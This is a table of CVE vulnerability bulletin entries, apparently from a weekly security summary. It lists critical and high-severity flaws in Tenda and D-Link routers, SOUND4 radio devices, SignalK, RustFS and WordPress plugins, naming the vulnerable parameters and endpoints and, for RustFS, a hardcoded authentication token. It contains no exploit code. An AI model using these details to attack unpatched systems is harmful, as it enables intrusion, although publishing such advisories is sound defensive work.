| SOUND4 Ltd.--Impact/Pulse/First | SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below contain an unauthenticated vulnerability that allows remote attackers to access live radio stream information through webplay or ffmpeg scripts. Attackers can exploit the vulnerability by calling specific web scripts to disclose radio stream details without requiring authentication. | 2025-12-30 | 9.8 | CVE-2022-50790 | Zero Science Lab Disclosure (ZSL-2022-5734) Packet Storm Security Exploit Details IBM X-Force Vulnerability Exchange Entry SOUND4 Product Homepage VulnCheck Advisory: SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x Unauthenticated Radio Stream Disclosure |
| SOUND4 Ltd.--Impact/Pulse/First | SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below contain an unauthenticated file disclosure vulnerability that allows remote attackers to access sensitive system files. Attackers can exploit the vulnerability by manipulating the 'file' GET parameter to disclose arbitrary files on the affected device. | 2025-12-30 | 9.8 | CVE-2022-50792 | Zero Science Lab Disclosure (ZSL-2022-5736) Packet Storm Security Exploit Details IBM X-Force Vulnerability Exchange Entry SOUND4 Product Homepage VulnCheck Advisory: SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x Unauthenticated File Disclosure Vulnerability |
| SOUND4 Ltd.--Impact/Pulse/First | SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below contain an unauthenticated command injection vulnerability in the username parameter. Attackers can exploit index.php and login.php scripts by injecting arbitrary shell commands through the HTTP POST 'username' parameter to execute system commands. | 2025-12-30 | 9.8 | CVE-2022-50794 | Zero Science Lab Disclosure (ZSL-2022-5739) Packet Storm Security Exploit Details IBM X-Force Vulnerability Exchange Entry SOUND4 Product Homepage VulnCheck Advisory: SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x Unauthenticated Command Injection via Username |
| JM-DATA ONU--JF511-TV | JM-DATA ONU JF511-TV version 1.0.67 uses default credentials that allow attackers to gain unauthorized access to the device with administrative privileges. | 2025-12-30 | 9.8 | CVE-2022-50803 | Zero Science Lab Disclosure (ZSL-2022-5708) Packet Storm Security Exploit Entry CXSecurity Vulnerability Listing IBM X-Force Vulnerability Exchange Entry JM-DATA Vendor Homepage VulnCheck Advisory: JM-DATA ONU JF511-TV 1.0.67 Default Credentials Vulnerability |
| The Akuvox Company--Akuvox Smart Doorphone | Akuvox Smart Intercom S539 contains an unauthenticated vulnerability that allows remote attackers to access live video streams by requesting the video.cgi endpoint on port 8080. Attackers can retrieve video stream data without authentication by directly accessing the specified endpoint on affected Akuvox doorphone and intercom devices. | 2025-12-30 | 9.8 | CVE-2024-58336 | Zero Science Lab Disclosure (ZSL-2024-5826) Packet Storm Security Exploit Entry VulnCheck Advisory: Akuvox Smart Intercom S539 Unauthenticated Video Stream Disclosure |
| Ateme--Flamingo XL | Anevia Flamingo XL 3.2.9 contains a restricted shell vulnerability that allows remote attackers to escape the sandboxed environment through the traceroute command. Attackers can exploit the traceroute command to inject shell commands and gain full root access to the device by bypassing the restricted login environment. | 2025-12-30 | 9.8 | CVE-2024-58338 | ExploitDB-51516 Ateme Vendor Homepage Zero Science Lab Disclosure (ZSL-2023-5780) VulnCheck Advisory: Anevia Flamingo XL 3.2.9 Remote Root Jailbreak via Traceroute Command |
| wpmudev--Branda White Label & Branding, Free Login Page Customizer | The Branda plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 3.4.24. This is due to the plugin not properly validating a user's identity prior to updating their password. This makes it possible for unauthenticated attackers to change arbitrary user's passwords, including administrators, and leverage that to gain access to their account. | 2026-01-02 | 9.8 | CVE-2025-14998 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ae46be82-570f-4172-9c3f-746b894b84b9?source=cve https://plugins.trac.wordpress.org/browser/branda-white-labeling/tags/3.4.24/inc/modules/login-screen/signup-password.php#L24 https://plugins.trac.wordpress.org/changeset/3429115/branda-white-labeling#file1749 |
| Delta Electronics--DVP-12SE11T | DVP-12SE11T - Password Protection Bypass | 2025-12-30 | 9.1 | CVE-2025-15102 | https://filecenter.deltaww.com/news/download/doc/Delta-PCSA-2025-00022_DVP-12SE11T%20Multiple%20Vulnerabilities.pdf |
| Ksenia Security S.p.A.--Ksenia Security Lares 4.0 Home Automation | Ksenia Security Lares 4.0 Home Automation version 1.6 contains a critical security flaw that exposes the alarm system PIN in the 'basisInfo' XML file after authentication. Attackers can retrieve the PIN from the server response to bypass security measures and disable the alarm system without additional authentication. | 2025-12-30 | 9.8 | CVE-2025-15114 | Zero Science Lab Disclosure (ZSL-2025-5929) VulnCheck Advisory: Ksenia Security Lares 4.0 Home Automation 1.6 PIN Exposure Vulnerability |
| D-Link--DIR-600 | A vulnerability was found in D-Link DIR-600 up to 2.15WWb02. Affected by this vulnerability is an unknown functionality of the file hedwig.cgi of the component HTTP Header Handler. The manipulation of the argument Cookie results in stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been made public and could be used. This vulnerability only affects products that are no longer supported by the maintainer. | 2025-12-29 | 9.8 | CVE-2025-15194 | VDB-338581 \| D-Link DIR-600 HTTP Header hedwig.cgi stack-based overflow VDB-338581 \| CTI Indicators (IOB, IOC, IOA) Submit #724404 \| D-Link DIR-600 v2.15WWb02 and possibly earlier versions Stack-based Buffer Overflow https://github.com/LonTan0/CVE/blob/main/Stack-Based%20Buffer%20Overflow%20Vulnerability%20in%20hedwig.cgi%20of%20D-Link%20DIR-600.md https://github.com/LonTan0/CVE/blob/main/Stack-Based%20Buffer%20Overflow%20Vulnerability%20in%20hedwig.cgi%20of%20D-Link%20DIR-600.md#poc https://www.dlink.com/ |
| Sunnet--WMPro | WMPro developed by Sunnet has an Arbitrary File Upload vulnerability, allowing unauthenticated remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server. | 2025-12-29 | 9.8 | CVE-2025-15226 | https://www.twcert.org.tw/tw/cp-132-10602-c1c69-1.html https://www.twcert.org.tw/en/cp-139-10603-67149-2.html |
| WELLTEND TECHNOLOGY--BPMFlowWebkit | BPMFlowWebkit developed by WELLTEND TECHNOLOGY has an Arbitrary File Upload vulnerability, allowing unauthenticated remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server. | 2025-12-29 | 9.8 | CVE-2025-15228 | https://www.twcert.org.tw/tw/cp-132-10604-c65aa-1.html https://www.twcert.org.tw/en/cp-139-10605-426b6-2.html |
| Tenda--W6-S | A vulnerability was determined in Tenda W6-S 1.0.0.4(510). This impacts an unknown function of the file /bin/httpd of the component R7websSsecurityHandler. Executing manipulation of the argument Cookie can lead to stack-based buffer overflow. The attack may be launched remotely. The exploit has been publicly disclosed and may be utilized. | 2025-12-30 | 9.8 | CVE-2025-15255 | VDB-338645 \| Tenda W6-S R7websSsecurityHandler httpd stack-based overflow VDB-338645 \| CTI Indicators (IOB, IOC, IOA) Submit #725500 \| Tenda W6-S V1.0.0.4(510) Stack-based Buffer Overflow https://github.com/dwBruijn/CVEs/blob/main/Tenda/R7WebsSecurityHandler.md https://www.tenda.com.cn/ |
| Delta Electronics--DVP-12SE11T | DVP-12SE11T - Out-of-bound memory write Vulnerability | 2025-12-30 | 9.1 | CVE-2025-15359 | https://filecenter.deltaww.com/news/download/doc/Delta-PCSA-2025-00022_DVP-12SE11T%20Multiple%20Vulnerabilities.pdf |
| ConoHa by GMO--WING WordPress Migrator | Cross-Site Request Forgery (CSRF) vulnerability in ConoHa by GMO WING WordPress Migrator allows Upload a Web Shell to a Web Server. This issue affects WING WordPress Migrator: from n/a through 1.1.9. | 2025-12-30 | 9.6 | CVE-2025-52835 | https://vdp.patchstack.com/database/wordpress/plugin/wing-migrator/vulnerability/wordpress-wing-wordpress-migrator-plugin-1-1-9-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| SignalK--signalk-server | Signal K Server is a server application that runs on a central hub in a boat. Prior to version 2.19.0, an unauthenticated attacker can pollute the internal state (`restoreFilePath`) of the server via the `/skServer/validateBackup` endpoint. This allows the attacker to hijack the administrator's "Restore" functionality to overwrite critical server configuration files (e.g., `security.json`, `package.json`), leading to account takeover and Remote Code Execution (RCE). Version 2.19.0 patches this vulnerability. | 2026-01-01 | 9.7 | CVE-2025-66398 | https://github.com/SignalK/signalk-server/security/advisories/GHSA-w3x5-7c4c-66p9 https://github.com/SignalK/signalk-server/releases/tag/v2.19.0 |
| RomanCode--MapSVG | Unrestricted Upload of File with Dangerous Type vulnerability in RomanCode MapSVG allows Upload a Web Shell to a Web Server. This issue affects MapSVG: from n/a through 8.7.3. | 2025-12-29 | 9.9 | CVE-2025-68562 | https://vdp.patchstack.com/database/wordpress/plugin/mapsvg-lite-interactive-vector-maps/vulnerability/wordpress-mapsvg-plugin-8-7-3-arbitrary-file-upload-vulnerability?_s_id=cve |
| SignalK--signalk-server | Signal K Server is a server application that runs on a central hub in a boat. Versions prior to 2.19.0 expose two features that can be chained together to steal JWT authentication tokens without any prior authentication. The attack combines WebSocket-based request enumeration with unauthenticated polling of access request status. The first is Unauthenticated WebSocket Request Enumeration: When a WebSocket client connects to the SignalK stream endpoint with the `serverevents=all` query parameter, the server sends all cached server events including `ACCESS_REQUEST` events that contain details about pending access requests. The `startServerEvents` function iterates over `app.lastServerEvents` and writes each cached event to any connected client without verifying authorization level. Since WebSocket connections are allowed for readonly users (which includes unauthenticated users when `allow_readonly` is true), attackers receive these events containing request IDs, client identifiers, descriptions, requested permissions, and IP addresses. The second is Unauthenticated Token Polling: The access request status endpoint at `/signalk/v1/access/requests/:id` returns the full state of an access request without requiring authentication. When an administrator approves a request, the response includes the issued JWT token in plaintext. The `queryRequest` function returns the complete request object including the token field, and the REST endpoint uses readonly authentication, allowing unauthenticated access. An attacker has two paths to exploit these vulnerabilities. Either the attacker creates their own access request (using the IP spoofing vulnerability to craft a convincing spoofed request), then polls their own request ID until an administrator approves it, receiving the JWT token; or the attacker passively monitors the WebSocket stream to discover request IDs from legitimate devices, then polls those IDs and steals the JWT tokens when administrators approve them, hijacking legitimate device credentials. Both paths require zero authentication and enable complete authentication bypass. Version 2.19.0 fixes the underlying issues. | 2026-01-01 | 9.1 | CVE-2025-68620 | https://github.com/SignalK/signalk-server/security/advisories/GHSA-fq56-hvg6-wvm5 https://github.com/SignalK/signalk-server/releases/tag/v2.19.0 |
| Mobile Builder--Mobile builder | Authentication Bypass Using an Alternate Path or Channel vulnerability in Mobile Builder Mobile builder allows Authentication Abuse. This issue affects Mobile builder: from n/a through 1.4.2. | 2025-12-29 | 9.8 | CVE-2025-68860 | https://vdp.patchstack.com/database/wordpress/plugin/mobile-builder/vulnerability/wordpress-mobile-builder-plugin-1-4-2-broken-authentication-vulnerability?_s_id=cve |
| Mohammad I. Okfie--IF AS Shortcode | Improper Control of Generation of Code ('Code Injection') vulnerability in Mohammad I. Okfie IF AS Shortcode allows Code Injection. This issue affects IF AS Shortcode: from n/a through 1.2. | 2025-12-29 | 9.9 | CVE-2025-68897 | https://vdp.patchstack.com/database/wordpress/plugin/if-as-shortcode/vulnerability/wordpress-if-as-shortcode-plugin-1-2-remote-code-execution-rce-vulnerability?_s_id=cve |
| rustfs--rustfs | RustFS is a distributed object storage system built in Rust. In versions prior to 1.0.0-alpha.77, RustFS implements gRPC authentication using a hardcoded static token `"rustfs rpc"` that is publicly exposed in the source code repository, hardcoded on both client and server sides, non-configurable with no mechanism for token rotation, and universally valid across all RustFS deployments. Any attacker with network access to the gRPC port can authenticate using this publicly known token and execute privileged operations including data destruction, policy manipulation, and cluster configuration changes. Version 1.0.0-alpha.77 contains a fix for the issue. | 2025-12-30 | 9.8 | CVE-2025-68926 | https://github.com/rustfs/rustfs/security/advisories/GHSA-h956-rh7x-ppgj |
| frappe--frappe | Frappe is a full-stack web application framework. Prior to versions 14.99.6 and 15.88.1, an authenticated user with specific permissions could be tricked into accessing a specially crafted link. This could lead to a malicious template being executed on the server, resulting in remote code execution. Versions 14.99.6 and 15.88.1 fix the issue. No known workarounds are available. | 2025-12-29 | 9.1 | CVE-2025-68929 | https://github.com/frappe/frappe/security/advisories/GHSA-qq98-vfv9-xmxh https://github.com/frappe/frappe/releases/tag/v14.99.6 https://github.com/frappe/frappe/releases/tag/v15.88.1 |
| kromitgmbh--titra | Titra is open source project time tracking software. Prior to version 0.99.49, Titra allows any authenticated Admin user to modify the timeEntryRule in the database. The value is then passed to a NodeVM value to execute as code. Without sanitization, it leads to a Remote Code Execution. Version 0.99.49 fixes the issue. | 2025-12-31 | 9.1 | CVE-2025-69288 | https://github.com/kromitgmbh/titra/security/advisories/GHSA-pqgx-6wg3-gmvr https://github.com/kromitgmbh/titra/commit/2e2ac5cbeed47a76720b21c7fde0214a242e065e https://github.com/kromitgmbh/titra/releases/tag/0.99.49 |
| Selea--Selea CarPlateServer (CPS) | Selea CarPlateServer 4.0.1.6 contains an unquoted service path vulnerability in the Windows service configuration that allows local users to potentially execute code with elevated privileges. Attackers can exploit the service's unquoted binary path by inserting malicious code in the system root path that could execute with LocalSystem privileges during application startup or reboot. | 2025-12-31 | 8.4 | CVE-2020-36903 | ExploitDB-49453 Vendor Homepage Zero Science Lab Disclosure (ZSL-2021-5621) VulnCheck Advisory: Selea CarPlateServer 4.0.1.6 Local Privilege Escalation via Unquoted Service Path |
| Epic Games Inc.--Epic Games Psyonix Rocket League | Epic Games Psyonix Rocket League <=1.95 contains an insecure permissions vulnerability that allows authenticated users to modify executable files with full access permissions. Attackers can leverage the 'F' (Full) flag for the 'Authenticated Users' group to change executable files and potentially escalate system privileges. | 2025-12-31 | 8.8 | CVE-2021-47742 | Zero Science Lab Disclosure (ZSL-2021-5650) Packet Storm Security Exploit Entry IBM X-Force Vulnerability Exchange Entry Rocket League Product Homepage VulnCheck Advisory: Epic Games Psyonix Rocket League <=1.95 Elevation of Privileges via Insecure Permissions |
| Cypress--200 | Cypress Solutions CTM-200 2.7.1 contains an authenticated command injection vulnerability in the firmware upgrade script that allows remote attackers to execute shell commands. Attackers can exploit the 'fw_url' parameter in the ctm-config-upgrade.sh script to inject and execute arbitrary commands with root privileges. | 2025-12-31 | 8.8 | CVE-2021-47745 | ExploitDB-50408 Cypress Solutions Product Homepage Zero Science Lab Disclosure (ZSL-2021-5687) VulnCheck Advisory: Cypress Solutions CTM-200 2.7.1 Root Remote OS Command Injection via Firmware Upgrade |
| Metern--meterN | meterN 1.2.3 contains an authenticated remote code execution vulnerability in admin_meter2.php and admin_indicator2.php scripts. Attackers can exploit the 'COMMANDx' and 'LIVECOMMANDx' POST parameters to execute arbitrary system commands with administrative privileges. | 2025-12-31 | 8.8 | CVE-2021-47747 | ExploitDB-50596 Archived Vendor Homepage Zero Science Lab Disclosure (ZSL-2021-5690) VulnCheck Advisory: meterN 1.2.3 Authenticated Remote Code Execution via Admin Scripts |
| SOUND4 Ltd.--Impact/Pulse/First | SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x contains an SQL injection vulnerability in the 'username' POST parameter of index.php that allows attackers to manipulate database queries. Attackers can inject arbitrary SQL code through the username parameter to bypass authentication and potentially access unauthorized database information. | 2025-12-30 | 8.2 | CVE-2022-50694 | Zero Science Lab Disclosure (ZSL-2022-5727) Packet Storm Security Exploit Details IBM X-Force Vulnerability Exchange Entry SOUND4 Product Homepage VulnCheck Advisory: SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x SQL Injection via Username Parameter |
| SOUND4 Ltd.--Impact/Pulse/First | SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x contains a command injection vulnerability that allows local authenticated users to create malicious files in the /tmp directory with .dns.pid extension. Unauthenticated attackers can execute the malicious commands by making a single HTTP POST request to the vulnerable dns.php script, which triggers command execution and then deletes the file. | 2025-12-30 | 8.4 | CVE-2022-50789 | Zero Science Lab Disclosure (ZSL-2022-5733) Packet Storm Security Exploit Details IBM X-Force Vulnerability Exchange Entry SOUND4 Product Homepage VulnCheck Advisory: SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x Conditional Command Injection via dns.php |
| SOUND4 Ltd.--Impact/Pulse/First | SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x contains a conditional command injection vulnerability that allows local authenticated users to create malicious files in the /tmp directory. Unauthenticated attackers can execute commands by making a single HTTP POST request to the vulnerable ping.php script, which triggers the malicious file and then deletes it. | 2025-12-30 | 8.4 | CVE-2022-50791 | Zero Science Lab Disclosure (ZSL-2022-5735) Packet Storm Security Exploit Details IBM X-Force Vulnerability Exchange Entry SOUND4 Product Homepage VulnCheck Advisory: SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x Conditional Command Injection via ping.php |
| SOUND4 Ltd.--Impact/Pulse/First | SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x contains an authenticated command injection vulnerability in the www-data-handler.php script that allows attackers to inject system commands through the 'services' POST parameter. Attackers can exploit this vulnerability by crafting malicious 'services' parameter values to execute arbitrary system commands with www-data user privileges. | 2025-12-30 | 8.8 | CVE-2022-50793 | Zero Science Lab Disclosure (ZSL-2022-5737) Packet Storm Security Exploit Details IBM X-Force Vulnerability Exchange Entry SOUND4 Product Homepage VulnCheck Advisory: SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x Authenticated Command Injection via www-data-handler.php |
| SOUND4 Ltd.--Impact/Pulse/First | SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x contains a conditional command injection vulnerability that allows local authenticated users to create malicious files in the /tmp directory. Unauthenticated attackers can execute commands by making a single HTTP POST request to the traceroute.php script, which triggers the malicious file and then deletes it after execution. | 2025-12-30 | 8.4 | CVE-2022-50795 | Zero Science Lab Disclosure (ZSL-2022-5740) Packet Storm Security Exploit Details IBM X-Force Vulnerability Exchange Entry SOUND4 Product Homepage VulnCheck Advisory: SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x Conditional Command Injection via traceroute.php |
| NLB Banka AD Skopje--NLB mKlik Makedonija | NLB mKlik Macedonia 3.3.12 contains a SQL injection vulnerability in international transfer parameters that allows attackers to manipulate database queries. Attackers can inject arbitrary SQL code through unsanitized input to potentially disclose sensitive information from the mobile banking application. | 2025-12-30 | 8.2 | CVE-2023-54163 | Zero Science Lab Disclosure (ZSL-2023-5797) Google Play Store App Listing Packet Storm Security Exploit Entry CXSecurity Vulnerability Listing VulnCheck Advisory: NLB mKlik Macedonia 3.3.12 SQL Injection via International Transfer Parameters |
| Tosibox Oy--Tosibox Key Service | Tosibox Key Service 3.3.0 contains an unquoted service path vulnerability that allows local non-privileged users to potentially execute code with elevated system privileges. Attackers can exploit the service startup process by inserting malicious code in the system root path, enabling unauthorized code execution during application startup or system reboot. | 2025-12-30 | 8.4 | CVE-2024-58315 | Zero Science Lab Disclosure (ZSL-2024-5812) Packet Storm Security Exploit Entry Vendor Homepage VulnCheck Advisory: Tosibox Key Service 3.3.0 Local Privilege Escalation via Unquoted Service Path |
| Delta Electronics--DVP-12SE11T | DVP-12SE11T - Authentication Bypass via Partial Password Disclosure | 2025-12-30 | 8.1 | CVE-2025-15103 | https://filecenter.deltaww.com/news/download/doc/Delta-PCSA-2025-00022_DVP-12SE11T%20Multiple%20Vulnerabilities.pdf |
| Ksenia Security S.p.A.--Ksenia Security Lares 4.0 Home Automation | Ksenia Security Lares 4.0 version 1.6 contains a URL redirection vulnerability in the 'cmdOk.xml' script that allows attackers to manipulate the 'redirectPage' GET parameter. Attackers can craft malicious links that redirect authenticated users to arbitrary websites when clicking on a specially constructed link hosted on a trusted domain. | 2025-12-30 | 8 | CVE-2025-15112 | Zero Science Lab Disclosure (ZSL-2025-5928) Packet Storm Security Exploit Entry Ksenia Security Vendor Homepage VulnCheck Advisory: Ksenia Security Lares 4.0 Home Automation 1.6 URL Redirection Vulnerability |
| D-Link--DWR-M920 | A vulnerability was identified in D-Link DWR-M920 up to 1.1.50. This issue affects the function sub_464794 of the file /boafrm/formDefRoute. The manipulation of the argument submit-url leads to buffer overflow. The attack may be initiated remotely. The exploit is publicly available and might be used. | 2025-12-29 | 8.8 | CVE-2025-15189 | VDB-338574 \| D-Link DWR-M920 formDefRoute sub_464794 buffer overflow VDB-338574 \| CTI Indicators (IOB, IOC, IOA) Submit #723552 \| D-Link DWR-M920 VV1.1.50 Buffer Overflow https://github.com/panda666-888/vuls/blob/main/d-link/dwr-m920/formDefRoute.md https://github.com/panda666-888/vuls/blob/main/d-link/dwr-m920/formDefRoute.md#poc https://www.dlink.com/ |
| D-Link--DWR-M920 | A security flaw has been discovered in D-Link DWR-M920 up to 1.1.50. Impacted is the function sub_42261C of the file /boafrm/formFilter. The manipulation of the argument ip6addr results in stack-based buffer overflow. The attack may be launched remotely. The exploit has been released to the public and may be exploited. | 2025-12-29 | 8.8 | CVE-2025-15190 | VDB-338575 \| D-Link DWR-M920 formFilter sub_42261C stack-based overflow VDB-338575 \| CTI Indicators (IOB, IOC, IOA) Submit #723553 \| D-Link DWR-M920 V1.1.50 Buffer Overflow https://github.com/panda666-888/vuls/blob/main/d-link/dwr-m920/formFilter.md https://github.com/panda666-888/vuls/blob/main/d-link/dwr-m920/formFilter.md#poc https://www.dlink.com/ |
| D-Link--DWR-M920 | A vulnerability was detected in D-Link DWR-M920 up to 1.1.50. This affects the function sub_423848 of the file /boafrm/formParentControl. Performing manipulation of the argument submit-url results in buffer overflow. The attack is possible to be carried out remotely. The exploit is now public and may be used. | 2025-12-29 | 8.8 | CVE-2025-15193 | VDB-338578 \| D-Link DWR-M920 formParentControl sub_423848 buffer overflow VDB-338578 \| CTI Indicators (IOB, IOC, IOA) Submit #723556 \| D-Link DWR-M920 V1.1.50 Buffer Overflow https://github.com/panda666-888/vuls/blob/main/d-link/dwr-m920/formParentControl.md https://github.com/panda666-888/vuls/blob/main/d-link/dwr-m920/formParentControl.md#poc https://www.dlink.com/ |
| Tenda--AC10U | A vulnerability was determined in Tenda AC10U 15.03.06.48/15.03.06.49. This affects the function formSetPPTPUserList of the file /goform/setPptpUserList of the component HTTP POST Request Handler. This manipulation of the argument list causes buffer overflow. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized. | 2025-12-30 | 8.8 | CVE-2025-15215 | VDB-338600 \| Tenda AC10U HTTP POST Request setPptpUserList formSetPPTPUserList buffer overflow VDB-338600 \| CTI Indicators (IOB, IOC, IOA) Submit #725365 \| Tenda AC10U AC10U v1.0 Firmware V15.03.06.48、AC10U v1.0 Firmware V15.03.06.49 Buffer Overflow https://www.notion.so/Tenda-AC10U-setPptpUserList-2d753a41781f80e8ba6bc37ba6100343?pvs=73 https://www.tenda.com.cn/ |
| Tenda--AC23 | A vulnerability was identified in Tenda AC23 16.03.07.52. This impacts the function fromSetIpMacBind of the file /goform/SetIpMacBind. Such manipulation of the argument bindnum leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit is publicly available and might be used. | 2025-12-30 | 8.8 | CVE-2025-15216 | VDB-338601 \| Tenda AC23 SetIpMacBind fromSetIpMacBind stack-based overflow VDB-338601 \| CTI Indicators (IOB, IOC, IOA) Submit #725447 \| Tenda AC23 AC23 V16.03.07.52 Buffer Overflow https://lavender-bicycle-a5a.notion.site/Tenda-AC23-SetIpMacBind-2d753a41781f8026a001f16e85226a21?source=copy_link https://www.tenda.com.cn/ |
| Tenda--AC23 | A security flaw has been discovered in Tenda AC23 16.03.07.52. Affected is the function formSetPPTPUserList of the component HTTP POST Request Handler. Performing manipulation of the argument list results in buffer overflow. The attack can be initiated remotely. | 2025-12-30 | 8.8 | CVE-2025-15217 | VDB-338602 \| Tenda AC23 HTTP POST Request formSetPPTPUserList buffer overflow VDB-338602 \| CTI Indicators (IOB, IOC, IOA) Submit #725448 \| Tenda AC23 AC23 V16.03.07.52 Buffer Overflow https://lavender-bicycle-a5a.notion.site/Tenda-AC23-formSetPPTPUserList-2d753a41781f8091b772cf9e66a687f1?source=copy_link https://www.tenda.com.cn/ |
| Tenda--AC10U | A weakness has been identified in Tenda AC10U 15.03.06.48/15.03.06.49. Affected by this vulnerability is the function fromadvsetlanip of the file /goform/AdvSetLanip of the component POST Request Parameter Handler. Executing manipulation of the argument lanMask can lead to buffer overflow. The attack can be launched remotely. The exploit has been made available to the public and could be exploited. | 2025-12-30 | 8.8 | CVE-2025-15218 | VDB-338603 \| Tenda AC10U POST Request Parameter AdvSetLanip fromadvsetlanip buffer overflow VDB-338603 \| CTI Indicators (IOB, IOC, IOA) Submit #725461 \| Tenda AC10U AC10U v1.0 Firmware V15.03.06.48、AC10U v1.0 Firmware V15.03.06.49 Buffer Overflow https://lavender-bicycle-a5a.notion.site/Tenda-AC10U-fromadvsetlanip-2d753a41781f800c86c8d388a38e8101?source=copy_link https://www.tenda.com.cn/ |
| Tenda--M3 | A vulnerability was found in Tenda M3 1.0.0.13(4903). Affected by this issue is the function formSetVlanPolicy of the file /goform/setVlanPolicyData. Performing manipulation of the argument qvlan_truck_port results in heap-based buffer overflow. Remote exploitation of the attack is possible. The exploit has been made public and could be used. | 2025-12-30 | 8.8 | CVE-2025-15230 | VDB-338626 | Tenda M3 setVlanPolicyData formSetVlanPolicy heap-based overflow VDB-338626 | CTI Indicators (IOB, IOC, IOA) Submit #725490 | Tenda M3 V1.0.0.13(4903) Heap-based Buffer Overflow https://github.com/dwBruijn/CVEs/blob/main/Tenda/setVlanPolicy.md https://www.tenda.com.cn/ |
| Tenda--M3 | A vulnerability was determined in Tenda M3 1.0.0.13(4903). This affects the function formSetRemoteVlanInfo of the file /goform/setVlanInfo. Executing manipulation of the argument ID/vlan/port can lead to stack-based buffer overflow. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. | 2025-12-30 | 8.8 | CVE-2025-15231 | VDB-338627 | Tenda M3 setVlanInfo formSetRemoteVlanInfo stack-based overflow VDB-338627 | CTI Indicators (IOB, IOC, IOA) Submit #725493 | Tenda M3 V1.0.0.13(4903) Stack-based Buffer Overflow https://github.com/dwBruijn/CVEs/blob/main/Tenda/setRemoteVlanInfo.md https://www.tenda.com.cn/ |
| Tenda--M3 | A vulnerability was identified in Tenda M3 1.0.0.13(4903). This vulnerability affects the function formSetAdPushInfo of the file /goform/setAdPushInfo. The manipulation of the argument mac/terminal leads to stack-based buffer overflow. The attack is possible to be carried out remotely. The exploit is publicly available and might be used. | 2025-12-30 | 8.8 | CVE-2025-15232 | VDB-338628 | Tenda M3 setAdPushInfo formSetAdPushInfo stack-based overflow VDB-338628 | CTI Indicators (IOB, IOC, IOA) Submit #725494 | Tenda M3 V1.0.0.13(4903) Stack-based Buffer Overflow https://github.com/dwBruijn/CVEs/blob/main/Tenda/setAdPushInfo.md https://www.tenda.com.cn/ |
| Tenda--M3 | A security flaw has been discovered in Tenda M3 1.0.0.13(4903). This issue affects the function formSetAdInfoDetails of the file /goform/setAdInfoDetail. The manipulation of the argument adName/smsPassword/smsAccount/weixinAccount/weixinName/smsSignature/adRedirectUrl/adCopyRight/smsContent/adItemUID results in heap-based buffer overflow. The attack may be performed from remote. The exploit has been released to the public and may be exploited. | 2025-12-30 | 8.8 | CVE-2025-15233 | VDB-338629 | Tenda M3 setAdInfoDetail formSetAdInfoDetails heap-based overflow VDB-338629 | CTI Indicators (IOB, IOC, IOA) Submit #725495 | Tenda M3 V1.0.0.13(4903) Heap-based Buffer Overflow https://github.com/dwBruijn/CVEs/blob/main/Tenda/setAdInfoDetail.md https://www.tenda.com.cn/ |
| Tenda--M3 | A weakness has been identified in Tenda M3 1.0.0.13(4903). Impacted is the function formSetRemoteInternetLanInfo of the file /goform/setInternetLanInfo. This manipulation of the argument portIp/portMask/portGateWay/portDns/portSecDns causes heap-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be exploited. | 2025-12-30 | 8.8 | CVE-2025-15234 | VDB-338630 | Tenda M3 setInternetLanInfo formSetRemoteInternetLanInfo heap-based overflow VDB-338630 | CTI Indicators (IOB, IOC, IOA) Submit #725496 | Tenda M3 V1.0.0.13(4903) Heap-based Buffer Overflow https://github.com/dwBruijn/CVEs/blob/main/Tenda/setRemoteInternetLanInfo.md https://www.tenda.com.cn/ |
| Tenda--M3 | A flaw has been found in Tenda M3 1.0.0.13(4903). The affected element is the function formSetRemoteDhcpForAp of the file /goform/setDhcpAP. This manipulation of the argument startip/endip/leasetime/gateway/dns1/dns2 causes stack-based buffer overflow. The attack can be initiated remotely. The exploit has been published and may be used. | 2025-12-30 | 8.8 | CVE-2025-15252 | VDB-338642 | Tenda M3 setDhcpAP formSetRemoteDhcpForAp stack-based overflow VDB-338642 | CTI Indicators (IOB, IOC, IOA) Submit #725497 | Tenda M3 V1.0.0.13(4903) Stack-based Buffer Overflow https://github.com/dwBruijn/CVEs/blob/main/Tenda/setRemoteDhcpForAp.md https://www.tenda.com.cn/ |
| Tenda--M3 | A vulnerability has been found in Tenda M3 1.0.0.13(4903). The impacted element is an unknown function of the file /goform/exeCommand. Such manipulation of the argument cmdinput leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-12-30 | 8.8 | CVE-2025-15253 | VDB-338643 | Tenda M3 exeCommand stack-based overflow VDB-338643 | CTI Indicators (IOB, IOC, IOA) Submit #725498 | Tenda M3 V1.0.0.13(4903) Stack-based Buffer Overflow https://github.com/dwBruijn/CVEs/blob/main/Tenda/execCommand.md https://www.tenda.com.cn/ |
